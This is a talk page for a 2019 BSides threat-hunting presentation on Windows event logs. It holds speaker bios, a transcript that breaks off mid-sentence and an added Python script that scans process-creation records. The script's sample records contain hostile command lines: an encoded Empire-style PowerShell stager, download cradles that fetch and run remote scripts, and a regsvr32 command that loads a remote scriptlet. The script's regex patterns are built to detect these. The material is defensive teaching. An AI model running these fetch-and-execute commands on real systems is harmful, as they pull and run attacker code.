← All talks

Threat Hunting: Out of the Gate with Windows Logs

BSides Peru · 2019 · 50:06 · 226 views · Published 2019-07
About this talk
An introductory guide to threat hunting leveraging Windows event logs and open source tools. The talk covers hunting methodology, critical Windows logging configurations (process creation, PowerShell script block logging), and practical examples of detecting malicious activity including Empire stagers and suspicious PowerShell execution patterns without requiring expensive endpoint detection and response solutions.
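As an added illustration of the hunting described above (example code written for this page, not material from the talk or its speakers), here is a small Python hunt over a handful of constructed 4688-style process-creation records. It decodes -EncodedCommand payloads (base64 of UTF-16LE text), flags the launcher switch combination typical of Empire stagers (-NoP -sta -w 1 -enc), flags download cradles whether they arrive encoded or in plain text, flags regsvr32 pulling a remote scriptlet, and flags Windows system binaries launched from outside the system directories. The record field names, host names, documentation-range IPs and the .invalid domain are invented for the sample; treating SysWOW64 as a legitimate home for system binaries is an assumption the talk does not state.

```python
"""Hunt over Windows 4688 (process creation) records for the patterns the talk
calls out. Added example; every record below is constructed, not a real log."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


def ps_encoded(script: str) -> str:
    """PowerShell -EncodedCommand expects base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/launcher')"

# Constructed sample records (hosts, IPs and domain are invented). Keys mirror
# the 4688 fields you get once command-line auditing is enabled.
SAMPLE_EVENTS = [
    {"host": "WS01", "new_process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -noP -sta -w 1 -enc " + ps_encoded(CRADLE)},  # Empire launcher shape
    {"host": "SRV02", "new_process": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\services.exe",  # spawned by a service
     "cmdline": "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.5/stage2')\""},
    {"host": "WS03", "new_process": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://ser-example.invalid/a.sct scrobj.dll"},
    {"host": "WS04", "new_process": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "svchost.exe"},
    {"host": "WS05", "new_process": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"host": "WS06", "new_process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]


@dataclass(frozen=True)
class Finding:
    host: str
    reason: str
    detail: str


# Binaries that only belong in the Windows system directories. SysWOW64 is
# accepted too (assumption: 32-bit copies live there on 64-bit hosts).
SYSTEM_PROCS = {"csrss.exe", "svchost.exe", "lsass.exe", "wininit.exe",
                "winlogon.exe", "services.exe", "smss.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_RE = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")
LAUNCHER_FLAGS = {  # switch combination typical of Empire/PowerShell stagers
    "nop": re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"),
    "hidden": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b"),
    "sta": re.compile(r"(?i)(?:^|\s)-sta\b"),
    "noni": re.compile(r"(?i)(?:^|\s)-noni(?:nteractive)?\b"),
}
CRADLE_RE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression")
REGSVR_RE = re.compile(r"(?i)regsvr32.*\s/i:\s*https?://")  # remote .sct via scrobj.dll


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the plaintext of a -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_event(ev: dict) -> list[Finding]:
    """Apply the four checks to one 4688 record."""
    host, cmd = ev["host"], ev["cmdline"]
    exe = ev["new_process"].lower()
    findings: list[Finding] = []

    if exe.rsplit("\\", 1)[-1] in SYSTEM_PROCS and not exe.startswith(SYSTEM_DIRS):
        findings.append(Finding(host, "bad-launch-path", ev["new_process"]))

    flags = sorted(name for name, rx in LAUNCHER_FLAGS.items() if rx.search(cmd))
    if len(flags) >= 2:
        findings.append(Finding(host, "launcher-flags", " ".join(flags)))

    decoded = decode_encoded_command(cmd)
    if decoded is not None:  # surface the decoded script so the hunter can read it
        findings.append(Finding(host, "encoded-command", decoded))
    if CRADLE_RE.search(decoded if decoded is not None else cmd):
        findings.append(Finding(host, "download-cradle", decoded or cmd))

    if REGSVR_RE.search(cmd):
        findings.append(Finding(host, "regsvr32-remote-scriptlet", cmd))
    return findings


def hunt(events: list[dict]) -> list[Finding]:
    return [f for ev in events for f in hunt_event(ev)]


def reasons_by_host(events: list[dict]) -> dict[str, set[str]]:
    """Summarise which checks fired per host (hosts with no findings are absent)."""
    out: dict[str, set[str]] = {}
    for f in hunt(events):
        out.setdefault(f.host, set()).add(f.reason)
    return out


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host:6} {f.reason:26} {f.detail[:70]}")
```

Run it as a script to print the findings. On real data you would feed it the parsed 4688 fields (NewProcessName, ParentProcessName, CommandLine) from your SIEM or from Get-WinEvent; the two benign records show that an ordinary svchost.exe and an administrator's -ExecutionPolicy Bypass script do not fire, which matters because the talk's point is to hunt behaviour, not to alert on every PowerShell launch.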
GREG LONGO, BRIAN GARDINER

Threat hunting has been a hot buzzword for the better part of the past decade. Just how far has the security community come in breaking down the concept of hunting, and what has emerged as some of the industry best practices in this area? Countless blogs have been written, training courses developed, and conferences organized around the fundamentals of hunting: what it is, how to do it, and what makes it great. Nonetheless, the timeless question remains... how do I get started? Through a combination of guided discussion and hands-on demonstrations, this presentation will attempt to answer that question while also providing actionable material that attendees can immediately begin using to uncover anomalous activity, given the right access to data sources and contextual information. While focusing on the basics, this presentation will highlight the value of fundamental Windows logging and open source tools for threat hunting.

1. Introduction
   A. Emergence of threat hunting as a practice
   B. Challenges with getting started in an operationally effective manner
2. Methodology
   A. Overview of "how" to conduct hunting operations
   B. Associated frameworks (e.g. MITRE ATT&CK)
3. Data!
   A. Hunting is all about the data
   B. Exploring Microsoft Windows logs
4. Tools
   A. Community tools to the rescue
   B. Deploying and using open source tools to get your hunting expedition off the ground

Greg Longo is a senior threat analyst on the JASK Special Ops team with over a decade of cybersecurity experience in both the public and private sectors. Prior to joining JASK, Greg was the global threat management lead at Covestro and held a number of technical positions at CERT, part of the Software Engineering Institute at Carnegie Mellon University. Greg has been with the U.S. Air Force and Air National Guard since 2002 as a cyberspace operations officer and is currently the Commander of the 166th Communications Flight. Along the way, Greg has earned a Master of Science degree from Carnegie Mellon University along with a Bachelor of Business Administration degree from The University of Pittsburgh and a Master of Business Administration degree from Wright State University.

Brian Gardiner is a senior threat analyst on the JASK Special Ops team. Brian has over eight years of experience in cybersecurity with previous positions which include vulnerability analyst and security engineer, across both public and private sectors. Prior to JASK, Brian worked as a senior incident response analyst with IBM X-Force IRIS and at Aetna as the information security advisor for the Security Data Analytics team. Brian earned a Bachelor of Arts degree from The University of Pittsburgh and a Master of Science degree from Carnegie Mellon University.
Transcript [en]

All right, we're gonna go ahead and get started, so I'd like to introduce Greg Longo and Brian Gardiner. Greg is a senior threat analyst on the JASK Special Ops team with over a decade of cybersecurity experience in both the public and private sectors. Prior to joining JASK, Greg was the global threat management lead at Covestro and held a number of technical positions at CERT. Pardon me one second.

Sorry about that. So, where was I? Held a number of technical positions at CERT, part of the Software Engineering Institute at Carnegie Mellon. Greg has also been with the US Air Force and National Guard since 2002 as a cyberspace operations officer and is currently the commander of the 166th Communications Flight. Along the way, Greg has earned a Master of Science degree from Carnegie Mellon along with a Bachelor of Business Administration from the University of Pittsburgh and a Master of Business Administration degree from Wright State University. Brian is a senior threat analyst on the JASK Special Ops team. Brian has over eight years of experience in cybersecurity with previous positions which include vulnerability analyst and security engineer across both public and private sectors. Prior to JASK, Brian worked as a senior incident response analyst with IBM X-Force IRIS and at Aetna as the information security advisor of the Security Data Analytics team. Brian earned a Bachelor of Arts degree from the University of Pittsburgh and a Master of Science degree from Carnegie Mellon University. So with that being said, I'll go ahead and turn it over to you guys, and, yeah, let's rock and roll.

Okay, thank you. Can anybody hear us okay? Excellent. So thank you, Zach, thanks for having us out, thank everybody for showing up to this talk: Threat Hunting Out of the Gate with Windows Logs. Not a super creative title,

but I think you get the gist. I know we're getting you right after lunch, so the food coma's gonna set in, folks might be a couple beers in, a couple drinks in, but appreciate you hanging with us. We'll get through some early introductory material and then we'll really dig into some meat of the presentation here today. So as Zach mentioned, Brian and I both have spent some time in industry as well as sort of the academia/FFRDC land with CMU and the CERT program, so that means we know probably, you know, 50% of the people out here; we've got some relationship with everybody. But yeah, we're excited to be here. So you may be sitting there wondering, why am I here?

How many folks, real quick, this is the only audience participation I'll ask for, have active threat hunting programs within your organizations? Okay. How many of you guys that are not doing threat hunting have at least heard of threat hunting or understand the general concept of threat hunting? Good, okay, so for the most part pretty much everybody. This is really meant to be an introductory talk, so I want to make sure we set the stage for that, right? We're gonna get into some details about what you can do with Windows logs and things like that, but we're really gonna start at the very beginning, lay a foundation, talk about what threat hunting is, why it's really a thing for organizations these days, and then explain to folks how you can get started with minimal effort, really using Windows logs, which I'm guessing 99.9% of the folks out there have Windows logs in your environment. You're probably already collecting those logs; how do you make use of those in a threat hunting kind of capacity?

Quick roadmap of where we're gonna go. So we'll talk a little bit about, you know, again, what is threat hunting, why is it important, why is it a thing, what are the things you need to consider when you're building a threat hunting program, how do you get started, and then we'll really dive into the data. Brian's going to go through a whole bunch of Windows logs and a couple use cases that'll be really interesting. There's a lot of graphics on the slides, but hopefully these become available to folks afterwards and then you can reference those when you're back at your organizations.

So before we get into what threat hunting actually is and how you're gonna get started, let's talk a little bit about, like, why threat hunting? Why did this discipline come about? What were the revelations and the recognition that really drove this new kind of thing in our field, right? And a lot of that comes back to the realization that the adversaries that we're up against are becoming increasingly advanced and sophisticated in what they're doing, that

our technology landscape is constantly evolving, and what that means is that as we adopt new technology, our attack surface is constantly expanding and we're always playing catch-up there. It is an arms race between the defenders and the adversaries, but, you know, the cards aren't completely stacked against us as defenders, and we'll explain why.

So this should resonate with most folks, right? You know, out there in your organizations I'm sure you've got some constellation of security controls. Those controls could be administrative or operational kinds of controls, controls that are really driven by humans in the loop, so think of your policies and your procedures and your separation of duties and those kinds of things. You also have technical controls, so, you know, your firewall rules, your proxy rules, your ACLs, two-factor authentication, all these kinds of technical controls that are in place. And those controls, whether they're administrative, operational, technical, they exist on the spectrum of your endpoints and your network, right? So you put all these things together and this is what you use to protect your organizations. But the adversaries follow this notion of the cyber kill chain that Lockheed Martin coined in 2011. Everyone aware of the cyber kill chain? Pretty common, right? And so you've got these controls that are in place, and I call those exploitable gaps, because that's what the adversary is going to be targeting. But these are all the opportunities that the adversary has to find a hole in one of those controls that you've put in place, and at every stage along the kill chain that we have here, whether it's recon, weaponization, delivery, exploitation, all along the line you're gonna have controls in place and there's gonna be opportunities for adversaries to discover vulnerabilities there and exploit those vulnerabilities, right? Whether it's recon and you've got employees who are posting too much information on LinkedIn; weaponization, if they're grabbing stuff from your websites and they're weaponizing PDF documents that you may be hosting out there, or things like that. There's all kinds of opportunities for the adversary to take advantage of the information that we have out there.

So security's not a zero-sum game. It's an overused analogy, you may have used it yourself, but the idea of defending a castle, right? Defenders, you know, we operate sometimes within some artificially constrained bounds, and I mentioned that, you know, the cards aren't completely stacked against us. You hear the phrase or the saying that, yeah, as defenders we've got a tough job, we've got to defend this entire, you know, cyber key terrain that we have, right? We've got all these systems that we're trying to keep track of, inventory that we can't wrap our arms around, IT networks, OT networks, things like that, and the adversary just needs to find one way to get in, right? And that's all, they just need to find one exploit that works and they're in; meanwhile we've got to defend all this stuff. That's not exactly true, right? Because as defenders we should have the upper hand in knowing our environment, right? Ideally we should understand what we have, what's vulnerable, what we need to protect, how to protect it. And the adversary, yes, they do need to find an exploit, but they also need to put all the pieces together to get that exploit into your environment and to maintain some form of stealth in order to carry out whatever it is they want to do, right? So they've got a pretty challenging job ahead of them too, and as defenders we need to detect one thing along those lines, right? We need to find the spear phishing email, right, or the piece of malware that's beaconing out for C2, right, or something, and we're onto that adversary, and then it becomes an IR engagement and an investigation from that point on. So I wouldn't say that the cards are completely stacked against us; it is a back and forth, but, you know, as defenders we're not completely hamstrung.

So, you know, we put all the controls in place, but when an attacker breaches your network, the fundamental thing is your controls have failed somewhere, right?

You've got preventative controls that are in place, and again think of, you know, those technologies that are out there to stop an attack or stop a breach from actually happening, from getting in the front door: your email filters and your firewall rules and all those sorts of things, right? Those are supposed to stop the adversary at the front door. And then you've got detective controls, you know, so you're running a SIEM, right, and you've got other technology that should alert you when something does get in and fires off. So an attacker gets in, these controls have failed somewhere along the line. The punchline to all of this is, right, that your controls will eventually fail, right? That's the environment that we're in now. We're in this sort of realm of assumed breach kind of world, again, which is sort of where threat hunting kind of came from, but your controls will likely fail, attackers will get in and likely stay there, right? Average dwell time for an attacker used to be in the mid-200-plus days; I just read a recent report that that was down to just over a hundred days. So good on us, we're detecting the adversary a lot quicker, but still that's, you know, over three months of an adversary in your network, which gives them plenty of time to orient themselves, to move laterally, to move from, you know, their beachhead to a complete foothold to something else in your environment, to do recon and get what they need. So, you know, over 100 days is still a significant amount of time that we're up against.

So now threat hunting, you know, again, a lot of you guys are doing it, pretty much everyone has heard of it. It came about, you know, a while ago, over a decade ago or so, and it's really started to pick up here in the last number of years. So when we talk about threat hunting, what are we actually talking about? When folks get into it, you know, a lot of the hype for a lot of this is, you know, you've got a list of IP addresses or you've got a list of hashes and you start searching all your logs for that information, for those indicators, right? Indicator searching or indicator hunting. It's not exactly what we're talking about when we talk about threat hunting, but it is an easy place to get started. So we don't want folks to get confused and think, okay, so when I'm talking about hunting I'm talking about a malicious IP or a hash that now I just go off and search for in my environment. We're looking for really more of detecting the adversary's behavior in our environment and not so much these atomic indicator type things.

So as I mentioned, you know, the first reference that you can find on the Internet tracing threat hunting back is 2009. You know, the cyber defensive community for sure has really gained a lot from what's come out of the DoD and the military. Some friends at NSA in the Vulnerability Analysis and Operations branch published this slide during a red team/blue team presentation, and this was sort of the first indication of this concept of "hunt," right, and the idea of actively going out and searching for adversaries within your network. So, you know, just a little tidbit, interesting reading.

So what is hunting when we talk about it? Threat hunting is merely a means by which you as an analyst will deliberately and proactively go out to search for the presence of compromise, malicious activity, suspicious activity, something that you don't want in your environment that's been missed by your existing security controls. The easiest way to think of threat hunting, in my mind, is as sort of a form of proactive IR, really. You know, you're taking it upon yourself to go off and find this adversary that you're presuming is already in your network and has taken a foothold, and then it's retrospective, obviously, so, you know, you're not gonna go back over, you know, a year's worth of time likely, but within the last 30 days or 45 days to look for a specific kind of behavior

that you know the adversary exhibits. That's what we mean when we talk about threat hunting.

So threat hunting is a hypothesis-oriented, process-driven kind of activity. What we've laid out is just five notional steps to the threat hunting process. So, starting out with a hypothesis, something that you want to find, that's really the crux of threat hunting. You've got an idea in mind: this is what I'm gonna go search for. And when I go off and look for that, then you need to decide, well, based on what it is I want to look for, what data do I need, do I have that data, how do I collect that data? So you go through this sort of data analysis kind of phase. Then once you go off and you collect all those pieces of data, you're doing a validation of your hypothesis: did I find the threat that I was looking for? If not, why not? Do they not exist, or did I not look in the right place? And it's sort of an iterative process; you would continue to cycle back and make sure that you're looking at everything that you need to be looking at. And then you'll always want to be improving upon that process, so find ways to not conduct manual hunts over and over: can you automate, can you improve upon what you're doing? And finally, you want to make sure that whatever it is that you have done through your hunting engagement, your hunting operation, you have documented in some way, some wiki or something, so that you're able to retain that knowledge, go back to it, reference it in the future, and build upon this sort of knowledge base that you've gained through hunting operations.

So how do you establish the hypothesis? Where we start: MITRE's done a tremendous amount of work in mapping attacker TTPs, so the MITRE ATT&CK framework is an awesome place to start, a good reference for how adversaries have been known to operate in environments, their tactics, their tools, their techniques, you know, everything that they're doing. This is an awesome reference, but hunting is not an exact science and there's a lot of different approaches, right? So you could take the approach: I know that I have Windows logs, so what can I find in Windows logs? Okay, that's sort of more of a data-centric or a data-driven kind of approach, right? You've got a certain piece of data, what can you find in that data? Or you can take another approach where you say, I understand this particular adversary, or I read a threat report and I know that they exhibit this kind of behavior, so then you say, well, how do I detect that behavior and what logs do I need, what logs do I need to go get? And that's sort of more of a threat intel driven kind of approach, right? So you can look at it from a couple different perspectives. What we're gonna talk about here, or what we propose here, is that most everybody has Windows logs, so we're gonna do a combination of: let's take those Windows logs that we know you have, that we know you can collect, that we know you can go through, let's map that against what we know about some adversaries, like, say, you know, scheduled tasks as a persistence mechanism, right? Pretty common. So let's go through our Windows logs and look for scheduled tasks, right? Pretty low-hanging fruit. See what we can identify, see if there's anything odd that stands out. So that's a great place to start, and this is a lot of what Brian is gonna be talking through.

And so, building a plan. So once you've got all this stuff in mind, then you need to build a plan, right? Again, going back to understanding the adversary, understanding what data you have or can get access to, whether it's from the endpoint, whether it's from the network. Are there things that you can only detect on an endpoint? What kind of adversary activity is gonna generate network artifacts that you can then pull, right? And again, what do you have, what do you need to get? You go through your hunt, you do your investigation, you do various kinds of analytics on that data. You've got to do your interpretation of what it means, right? It's not always gonna be black and white, cut and dry; you're gonna have to interpret what you get back and whether or not that means something to you and your organization. Again, it kind of goes back to the idea that we as defenders do have the upper hand and that we have the best context of our environment, right? There's going to be some expert analysis or interpretation that you do with the data based on what you know of the environment. You may see things like TeamViewer in your environment, right, or remote access tools, that might be suspicious; it might be completely legitimate in another organization, right? So there's no blanket, you know, one-size-fits-all, "if you find this, this is bad," but it becomes an iterative process that you learn more about your environment as you go through it. And again, the documentation, of course.

So I'm gonna pass it over to Brian. Brian's gonna talk to some Windows logs and some interesting use cases.

All right, is everyone still awake? Good. Okay, 'cause I'm about to put you to sleep. I'm just kidding. Data is awesome. I've worked in a variety of different roles throughout my years here, and really what you can get from that is a different perspective on threat hunting, whether you're a sysadmin and you can only get Windows logs or you

know, whether you've got a full data lake, whole Hadoop stack, and you're logging absolutely everything in here and that connected fridge. You can really break down sort of where you want to be with your threat hunting. You don't have to have all network data, all logging, everything; it can be very specific to your role at your company or the maturity of your company. It just depends really what you have to work with.

So we're gonna talk about a couple of campaigns really quickly and then we'll dive into a bunch of the data that we need to do this stuff. So Turla. This one's awesome, pretty much the reason I put this on here. You can see it, like, they've done a lot of stuff with the military, a lot of stuff with government entities, but they've been switching recently to a lot of PowerShell-based activity, and this is absolutely nothing new. Everyone knows about PowerShell, although I was blown away, though, that they are actually using the profile to maintain persistence. I don't think I've seen that before, but it's a really interesting technique. Of course their payload too is PowerStallion, and there's a really good article on this that you can read; they'll give you a lot of the IOCs, you can really, like, dig into this tooling and kind of see what's occurring with that. But the interesting point here is when you start to look at, like, these threat actors or these campaigns and sort of, like, the tooling that they're utilizing, a lot of them have been going more and more and more open source. Like, you're not seeing as much custom stuff; you may from a couple of adversaries, but a lot of this stuff is, you can just go to GitHub and pull it down and do work with that. Like, it's pretty impressive.

And then this campaign, Frankenstein. This is my absolute favorite. I think it's the funniest name in the world. Like, I just imagine some, like, SOC guy running into management being like, "Oh my god, we've been breached by Frankenstein," and the management being like, "Dude, are you serious? Like, is that Mary Shelley's Frankenstein, or what are you talking about?" I just think it's hilarious. But one of the things that's really interesting about this group is that they've completely abandoned their own tooling. They are going to GitHub, pulling down what everyone has already done, they're taking that information, tweaking it a little bit, and utilizing that. So, like, when you start talking about attribution, like, primarily one of the best ways you can do this to a threat group is you take apart the code of the tooling that they're utilizing, and that's how you identify them. So what are we going to say now? Like, attribution's harmj0y? He developed, like, Empire. Like, it's not gonna fly anymore. So it's gonna start becoming a lot more interesting when you start to play the attribution game with some of this stuff. And then all these tools too, you can just go immediately, like FruityC2, Empire, they're out there, you can start working with them. And then the persistence mechanism here as well, so they're utilizing WinUpdate, so it's one of the scheduled tasks that they use. This is really interesting as well, nothing new, something that's definitely out there, but I just thought that this campaign was extremely interesting because they've actually broken away from custom tooling and they're just utilizing open source tools that are out there.

All right, so now down to it. Required log sources. Almost everyone in here, I'm assuming, is a Windows shop, so you have your default logging. This is stuff that is turned on by default, you have it, everyone sees it, everyone looks at it. There's a ton of information within there, I'm not gonna lie, you can do a lot of stuff with that: you detect lateral movement, account creation, etc. There's a lot you can do with that. What I'm more interested in is the actual advanced auditing, and the reason for this is a lot of this comes from probably doing IR for the past year and a half in my current position and just working with companies and seeing sort of what they're doing. I can think of one case where one company actually had these logs; just about every other company

that I worked with didn't have any of this. I know you're kind of probably thinking, like, well, isn't there an EDR that picks up all this stuff? There's a few out there that do, but you still need this logging in your own environment; there's a lot that you can do with this. So the reasons for this advanced auditing, it's really, it's, you know, fileless attacks, PowerShell is everywhere, living off the land, persistence detection, all of that stuff can be done with these logging sources implemented. You don't need a million-dollar tool in your environment; you have the tooling in there, you just need a GPO change to set this up, get the information flowing. And I know too, everyone's like, "Oh man, Sysmon's, like, the hottest thing in the world." It's sweet, I love it, but to be honest with you, from what I've seen with this and the customers that have implemented it, 99% of them have just gone to SwiftOnSecurity, pull down, do it. No one looks at the configuration file, no one understands that, you know, he just updated that but it's been a year; how do you know he didn't leave something out that's able to get into your environment? How is he understanding your environment better than you guys are? So through doing this advanced logging there's a ton you can do. With this you can start building out the whitelist that you need to put into that configuration file for Sysmon. So it's really good beginner stuff to start there; once you have this down, you understand what's occurring in your environment, then move to Sysmon, then get the extra log and get all the additional functionality that you want, once you understand, you know, where you live.

All right, this is guaranteed, I know people ask us all the freakin' time: volumes, because data is expensive depending on how you have it. So this is just baseline, one month, a thousand machines, solid Windows enterprise environment. This is kind of the numbers that you're looking at. So 4688, process creation, that's the biggest one, it's 147 million logs. Keep in mind here they have failure enabled as well as command line logging, so you could cut failure out of this, you could reduce the volume, you can get rid of 4103 module logging for PowerShell and just utilize script block logging. There's ways around this, you can play with this stuff, but this is just kind of an understanding. I just want to show everyone that, you know, you can work kind of within your budget, turn on what you need, maybe just deploy out to the machines you deem critical, kind of see how the logging flows, and then go from there.

All right, so this is the biggest thing. I just, I don't know why environments don't have this. Like, real quick, show of hands, who's logging this right now and knows, like, in their environment? Okay, yeah, that's okay. If there's one thing from this talk, like, you take away today, it's just go implement this. Like, put this in your environment. And the key with this is you have to enable command line process auditing. This essentially gives you the command line that is run for just about anything in your environment. So if you think of process creation, this is taking the actual process that's occurring in the environment: if you run a command, its parent process, its command, the .exe, command lines logged, you have all of that there. It is so rich for hunting, it's ridiculous. And even just looking to see, you know, like, what administrators are doing, like, what's occurring in the environment. It is definitely the event ID to ensure that you have within your environment.

So I did this for all of them, we're gonna go through a couple of event IDs, but I put this on here so when we share the slides you know exactly where to go, how to set this up, the screenshot of what it looks like. When I was searching for some of this stuff, it's kind of difficult to find, like, a good resource that has all of this, and I know everyone's like, go to Microsoft's site; they don't have everything really well laid out for advanced auditing, I'll be the first to admit that. So this is just a way you can come back, look at the slides, and be like, give it to, like, your systems administrators, look at it, be like, hey, we need this GPO put in, this is where you do it. This is what it looks like when you're within Group Policy, and then this is the actual configuration for enabling process creation, 4688. So this is where, like, I have success and failure checked; if you were worried about log volume, you don't check failure here, just run success, go from there. This is the actual command line configuration; this is the most important

piece to enabling this, so you have to have this configured.

All right, and then what you can do with it. So, just like searching through logs, you're gonna start to see, I hope, oh yeah, you guys can see that, sweet, you're gonna start to see command lines that are, like, really ridiculously interesting when you start running stuff, like whether you're doing this in a home lab or you're in your environment. You can start correlating all of this data, start looking through it and see, I mean, this is a no-brainer. You can immediately see the huge blob of obfuscation, you can see, like, the -sta, the -w 1, it's definitely an Empire stager, the -NoP. Like, this is the power that you can get from it. So by looking at that process command line, if you have not enabled that with this logging you will not see this, so, like, the log loses a lot of value immediately. That's why it's so critical that you actually enable that. So here's another one, another malicious PowerShell. This one's utilizing a service creation and then it's pointing to cmd.exe, PowerShell's downloading another stager from an external IP. So you're gonna start to see these types of malicious commands in your environment. This is stuff that, like, you wouldn't normally ever be able to find, depending on, like, the tooling and the controls that you have in place. This is free, this is in Microsoft, you can turn this on and do this immediately.

All right, my other favorite one. So I know there's a talk earlier this morning, the guy went over this pretty well, it's awesome. How many people that are in here, like, offensively utilize this technique? Can you, like, raise your hands, like, for pentesting, red teaming, anything? All right, no one wants to give that away, okay. I'm telling you right now, as a blue teamer, start looking for this, because it's just insane what you can do with this technique. So the breakdown to this is any single user can run this; you don't have to be an administrator to type this command out and run this. We find it all of the time. A really good example of this: one of the customers I worked with, we turned on 4688, we turned on the process command line log, and what popped up, as you can see on the bottom there, the regsvr32.exe, it's, like, the second command line, to the server ser-whatever.ru. So that had been running in their environment on 15 machines for over a year, unchecked. They had no idea what that is; it's actually a remnant from the old Andromeda campaign from 2017, so the domain was definitely blown, but it's one of those things that they had no idea. And yes, they had an EDR, they had all kinds of stuff, it didn't relate any of this information until we started digging through the logs. So it's one of those things that you really, really need to enable this event ID, start taking a look at it, start seeing what's occurring. You're gonna start to see probably remnants in your environment from past campaigns that you just didn't have the controls or the tooling in place to notice. And the Carbon Black article is amazing on that; it's a little bit dated, but this is still a used technique, we still find it all the time.

All right, so other interesting behavior that you can do with this event ID. This is a huge one in SANS, like, if you take, like, a forensics course there. Pretty much you can look at the process launch location, so when you think about, like, Windows system processes, you think of, like, csrss, like svchost, lsass, wininit, there's tons. But, like, a really good way to check this is if those aren't running from System32, you've got an issue. Like, if that's running from, like, AppData, Temp, or something like that, there's definitely something occurring. So you can write rules based on this to look at non-standard launch path locations; it's an immediate win, you can see what's occurring right there. Some of the other stuff you can do: you can just start searching for command lines, like known things that adversaries use, red team uses, or just want to see what's occurring within your own environment. whoami, like, that's been used a billion times, but it's still a giveaway, because you know who you are on your system; if that's running in your environment, chances are someone shouldn't be there. netstat, same thing, looking for listening ports, open ports, etc. And then you're going to see stuff like this, like the net services piece, scheduled tasks, there's a lot of PowerShell command lines that are out there that do a lot of different things that are pretty bad: turning off all the firewall profiles, and then just the large chunks of obfuscated code. You don't have to

know what the command line does but there's probably no one in your environment that's gonna run off you skated code that would just be weird it just wouldn't make sense okay so next of an ID four six nine eight scheduled tasks not as important as process creation but this is a huge one I mean how many adversaries how many campaigns and groups are out there that utilize scheduled tasks as a persistence mechanism how do you guys monitor those what do you look at do you have something that says like hey this was created our environment this is legit or this isn't there's tons of these out there um when you also enable some of these advanced audit policy rules will

also enable a bunch of other event IDs within this so like you might have like scheduled tasks updated deleted etc I'm just talking about like the main one for now there's still a lot of other stuff that you can do with the residual task or event IDs that are created as well okay this is the same so I'm just gonna skip through these like if you wanted to after you could find exactly how to set these up and configure them and utilize them and it's the same thing here as well log volume uncheck failure if you want to have a little bit less so just go into mitre looking at like the actual TTP's that are in there you can see all

of these groups every single one of them uses scheduled tasks for persistence if you are not monitoring scheduled task creation you are probably missing a massive chunk of this within your environment ok so here's another issue from previously I've done this before where you start looking for scheduled tasks when you're trying to find persistence and you go to the users computer this one's clean it only has like probably like eight but I've seen people that have hundreds and you're like oh my god I can never ever figure out what each one of these does that's a sort of a benefit to doing this and enabling this is if you have a time frame from some other indicator that's

fired in your environment you can go back and look at that time frame in the logs for this that would be one way to do it the other one you're gonna have to probably start googling a lot of stuff or praying that there's information within the schedule tasks that they filled out where you can get that information and understand actually what's occurring with that task easiest way to do it would be like to look at the naming convention and be like oh this one's garbled it's you know 30 characters uppercase lowercase that's probably not legit there's actually companies that do that so you you really have to kind of google around a little bit to do that alright so fin 7 this is

like just a current example one of the the persistence mechanisms that they utilize is they do a double schedule tasks or an lnk file when it's downloaded so the first one that you're gonna see is Intel and then the second one that's what I talked about it's that garble II like eat I think it's 12 characters actually uppercase and lowercase no numbers but you'll start to see this stuff you can start taking a look at these and if you start logging this what you could do is you could just do like a weekly task to do like maybe a count or a sort depending on the tooling that you have in your environment just list them out start looking at it just

maybe look at the user who created it look at the naming and go from there it's definitely something you should be monitoring and taking a much closer look at this is the same thing with Frankenstein as before they utilize win update which I would never see if I was just looking through a massive massive list of them but it's the same thing like you really have to pay attention to these you really have to understand what's occurring in your environment and they're surprisingly there shouldn't be as many scheduled tasks created in a Windows environment as you would think like a massive massive enterprise you might see maybe a thousand a month depending on how your administrators do

business within the environment it shouldn't be too too bad alright four six nine seven service creation so this is like I know people are gonna say it this is already in the logs this is in the system log 704 five by default it is but this is the way I rationalize this is it's like me living in Butler and my best friend in the South Hills we're making that friggin Drive like it doesn't matter he could be in California and be like the same thing it's getting somebody that's a security analyst or any kind of analysts in your company like how often do they dig into the system logs or the application logs it's like probably never so the reason that I

really like this one is it forces you to look at it because now it's in the security log all of your tools are probably ingesting just the security log so you're gonna actually see it now but this is just with Windows 10 and up into there all right so same set up group policy same thing here you can also do failure I'd recommend just doing success for this so in the attack framework this is the same kind of deal you're gonna have execution and you're gonna have persistence it's utilized in two different ways so it's definitely worth taking a look at like if you ever heard of like the SC command this logs it this will show you

that so this is just execution here this is persistence here I mean this is common all of the newest groups a lot of the older groups they're all utilizing this technique if you're not logging this you're definitely missing it all right so a quick example here so this is carbon at door I think I may have missed this up when I did it so it's what carbon act does is it takes a common service it just it's like Russian roulette it'll just take a common service name and it's gonna pin sis to it but I thought that it deleted the actual last character of the service and I think it does the first so this is

